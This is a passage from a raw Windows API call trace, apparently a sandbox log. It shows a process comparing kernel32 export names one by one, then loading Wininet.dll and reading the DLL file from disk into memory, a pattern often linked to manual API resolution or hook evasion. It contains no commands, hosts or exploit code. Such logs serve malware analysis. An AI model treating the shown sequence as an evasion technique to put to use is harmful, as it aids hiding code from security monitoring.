(lpString1="ActivateActCtx", lpString2="ActivateActCtx") returned 0 [0119.480] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0119.480] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0119.480] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtx") returned 1 [0119.480] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtxWorker") returned 0 [0119.480] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockExclusive") returned 1 [0119.480] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockShared") returned 1 [0119.480] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtx") returned 1 [0119.480] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtxWorker") returned 1 [0119.480] lstrcmpA (lpString1="AddAtomA", lpString2="AddAtomA") returned 0 [0119.480] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockExclusive") returned 1 [0119.480] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockShared") returned 1 [0119.480] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtx") returned 1 [0119.480] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtxWorker") returned 1 [0119.480] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomA") returned 1 [0119.480] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomW") returned 0 [0119.480] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockExclusive") returned 1 [0119.481] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockShared") returned 1 [0119.481] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtx") returned 1 [0119.481] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtxWorker") returned 1 [0119.481] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomA") returned 1 [0119.481] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomW") returned 1 [0119.481] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddConsoleAliasA") returned 0 [0119.481] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockExclusive") returned 1 [0119.481] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockShared") returned 1 [0119.481] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtx") returned 1 [0119.481] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtxWorker") returned 1 [0119.481] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomA") returned 1 [0119.481] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomW") returned 1 [0119.481] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasA") returned 1 [0119.481] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasW") returned 0 [0119.481] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0119.481] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0119.481] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0119.481] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0119.482] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0119.482] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0119.482] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0119.482] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0119.482] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0119.482] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 0 [0119.482] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockExclusive") returned 1 [0119.482] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockShared") returned 1 [0119.482] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtx") returned 1 [0119.482] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtxWorker") returned 1 [0119.482] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomA") returned 1 [0119.482] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomW") returned 1 [0119.482] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasA") returned 1 [0119.482] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasW") returned 1 [0119.482] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddDllDirectory") returned 1 [0119.483] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0119.483] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddLocalAlternateComputerNameA") returned 0 [0119.483] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockExclusive") returned 1 [0119.483] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockShared") returned 1 [0119.483] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtx") returned 1 [0119.483] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtxWorker") returned 1 [0119.483] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomA") returned 1 [0119.483] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomW") returned 1 [0119.483] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasA") returned 1 [0119.483] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasW") returned 1 [0119.483] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddDllDirectory") returned 1 [0119.483] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0119.483] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameA") returned 1 [0119.483] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameW") returned 0 [0119.484] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0119.484] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockShared") returned 1 [0119.484] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtx") returned 1 [0119.484] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtxWorker") returned 1 [0119.484] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomA") returned 1 [0119.484] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomW") returned 1 [0119.484] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasA") returned 1 [0119.484] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasW") returned 1 [0119.484] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddDllDirectory") returned 1 [0119.484] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0119.484] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameA") returned 1 [0119.484] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameW") returned 1 [0119.484] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddRefActCtx") returned 0 [0119.484] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0119.484] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0119.484] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtx") returned 1 [0119.484] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtxWorker") returned 1 [0119.484] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomA") returned 1 [0119.484] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomW") returned 1 [0119.484] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasA") returned 1 [0119.484] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasW") returned 1 [0119.484] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddDllDirectory") returned 1 [0119.484] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0119.485] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameA") returned 1 [0119.485] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameW") returned 1 [0119.485] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtx") returned 1 [0119.485] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtxWorker") returned 0 [0119.485] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockExclusive") returned 1 [0119.485] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockShared") returned 1 [0119.485] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtx") returned 1 [0119.485] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtxWorker") returned 1 [0119.485] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomA") returned 1 [0119.485] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomW") returned 1 [0119.485] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasA") returned 1 [0119.485] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasW") returned 1 [0119.485] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddDllDirectory") returned 1 [0119.485] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0119.485] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0119.485] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0119.485] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtx") returned 1 [0119.486] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtxWorker") returned 1 [0119.486] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddResourceAttributeAce") returned 0 [0119.486] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0119.486] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0119.486] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0119.486] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0119.486] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0119.486] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0119.486] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0119.486] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0119.486] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0119.486] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0119.486] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameA") returned 1 [0119.486] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameW") returned 1 [0119.486] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtx") returned 1 [0119.487] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtxWorker") returned 1 [0119.487] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddResourceAttributeAce") returned 1 [0119.487] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddSIDToBoundaryDescriptor") returned 0 [0119.487] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockExclusive") returned 1 [0119.487] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockShared") returned 1 [0119.487] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtx") returned 1 [0119.487] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtxWorker") returned 1 [0119.487] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomA") returned 1 [0119.487] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomW") returned 1 [0119.487] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasA") returned 1 [0119.487] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasW") returned 1 [0119.487] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddDllDirectory") returned 1 [0119.487] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0119.487] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0119.487] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0119.487] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtx") returned 1 [0119.487] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtxWorker") returned 1 [0119.487] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddResourceAttributeAce") returned 1 [0119.488] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0119.488] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddScopedPolicyIDAce") returned 0 [0119.488] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockExclusive") returned 1 [0119.488] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockShared") returned 1 [0119.488] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtx") returned 1 [0119.488] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtxWorker") returned 1 [0119.488] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomA") returned 1 [0119.488] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomW") returned 1 [0119.488] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasA") returned 1 [0119.488] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasW") returned 1 [0119.488] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddDllDirectory") returned 1 [0119.488] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0119.488] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameA") returned 1 [0119.488] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameW") returned 1 [0119.488] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtx") returned 1 [0119.488] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtxWorker") returned 1 [0119.488] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddResourceAttributeAce") returned 1 [0119.488] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0119.489] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddScopedPolicyIDAce") returned 1 [0119.489] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSecureMemoryCacheCallback") returned 0 [0119.489] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockExclusive") returned 1 [0119.489] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockShared") returned 1 [0119.489] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtx") returned 1 [0119.489] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtxWorker") returned 1 [0119.489] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomA") returned 1 [0119.489] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomW") returned 1 [0119.489] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasA") returned 1 [0119.489] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasW") returned 1 [0119.489] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddDllDirectory") returned 1 [0119.489] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0119.489] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameA") returned 1 [0119.489] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameW") returned 1 [0119.489] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtx") returned 1 [0119.489] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtxWorker") returned 1 [0119.489] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddResourceAttributeAce") returned 1 [0119.489] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0119.489] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddScopedPolicyIDAce") returned 1 [0119.490] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSecureMemoryCacheCallback") returned 1 [0119.490] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredContinueHandler") returned 1 [0119.490] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredExceptionHandler") returned 1 [0119.490] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AdjustCalendarDate") returned 0 [0119.490] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockExclusive") returned 1 [0119.490] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockShared") returned 1 [0119.490] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtx") returned 1 [0119.490] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtxWorker") returned 1 [0119.490] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomA") returned 1 [0119.490] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomW") returned 1 [0119.490] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasA") returned 1 [0119.490] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasW") returned 1 [0119.490] lstrcmpA (lpString1="AllocConsole", lpString2="AddDllDirectory") returned 1 [0119.490] lstrcmpA (lpString1="AllocConsole", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0119.490] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameA") returned 1 [0119.490] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameW") returned 1 [0119.490] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtx") returned 1 [0119.490] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtxWorker") returned 1 [0119.490] lstrcmpA (lpString1="AllocConsole", lpString2="AddResourceAttributeAce") returned 1 [0119.490] lstrcmpA (lpString1="AllocConsole", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0119.490] lstrcmpA (lpString1="AllocConsole", lpString2="AddScopedPolicyIDAce") returned 1 [0119.490] lstrcmpA (lpString1="AllocConsole", lpString2="AddSecureMemoryCacheCallback") returned 1 [0119.491] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredContinueHandler") returned 1 [0119.491] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredExceptionHandler") returned 1 [0119.491] lstrcmpA (lpString1="AllocConsole", lpString2="AdjustCalendarDate") returned 1 [0119.491] lstrcmpA (lpString1="AllocConsole", lpString2="AllocConsole") returned 0 [0119.491] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockExclusive") returned 1 [0119.491] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockShared") returned 1 [0119.491] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtx") returned 1 [0119.491] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtxWorker") returned 1 [0119.491] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomA") returned 1 [0119.491] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomW") returned 1 [0119.491] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasA") returned 1 [0119.491] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasW") returned 1 [0119.491] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddDllDirectory") returned 1 [0119.491] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0119.491] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameA") returned 1 [0119.491] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameW") returned 1 [0119.491] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtx") returned 1 [0119.491] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtxWorker") returned 1 [0119.491] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddResourceAttributeAce") returned 1 [0119.492] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0119.492] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddScopedPolicyIDAce") returned 1 [0119.492] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSecureMemoryCacheCallback") returned 1 [0119.492] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredContinueHandler") returned 1 [0119.492] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredExceptionHandler") returned 1 [0119.492] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AdjustCalendarDate") returned 1 [0119.492] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocConsole") returned -1 [0119.492] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocateUserPhysicalPages") returned 0 [0119.492] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockExclusive") returned 1 [0119.492] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockShared") returned 1 [0119.492] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtx") returned 1 [0119.492] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtxWorker") returned 1 [0119.492] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomA") returned 1 [0119.492] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomW") returned 1 [0119.492] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasA") returned 1 [0119.492] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasW") returned 1 [0119.492] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddDllDirectory") returned 1 [0119.492] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0119.492] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameA") returned 1 [0119.492] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameW") returned 1 [0119.492] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtx") returned 1 [0119.492] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtxWorker") returned 1 [0119.492] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddResourceAttributeAce") returned 1 [0119.492] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0119.492] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddScopedPolicyIDAce") returned 1 [0119.492] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSecureMemoryCacheCallback") returned 1 [0119.492] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredContinueHandler") returned 1 [0119.492] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredExceptionHandler") returned 1 [0119.492] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AdjustCalendarDate") returned 1 [0119.493] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocConsole") returned -1 [0119.493] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPages") returned 1 [0119.493] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPagesNuma") returned 0 [0122.727] GetProcessHeap () returned 0x530000 [0122.727] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x55c5d0 | out: hHeap=0x530000) returned 1 [0122.735] GetProcessHeap () returned 0x530000 [0122.735] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x10) returned 0x549100 [0122.736] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x7ffc51070000 [0122.752] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0122.752] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0122.752] GetModuleFileNameA (in: hModule=0x7ffc51070000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")) returned 0x1f [0122.752] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0122.752] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0122.752] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0122.752] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=2647552) returned 1 [0122.752] GetProcessHeap () returned 0x530000 [0122.752] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x286600) returned 0x411f040 [0122.998] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0122.999] ReadFile (in: hFile=0x140, lpBuffer=0x411f040, nNumberOfBytesToRead=0x286600, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x411f040*, lpNumberOfBytesRead=0x14f5a4*=0x286600, lpOverlapped=0x0) returned 1 [0123.542] CloseHandle (hObject=0x140) returned 1 [0123.558] lstrcmpA (lpString1="AppCacheCheckManifest", lpString2="AppCacheCheckManifest") returned 0 [0123.558] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCheckManifest") returned 1 [0123.559] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCloseHandle") returned 0 [0123.559] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCheckManifest") returned 1 [0123.559] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCloseHandle") returned 1 [0123.559] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCreateAndCommitFile") returned 0 [0123.559] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCheckManifest") returned 1 [0123.559] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCloseHandle") returned 1 [0123.559] lstrcmpA 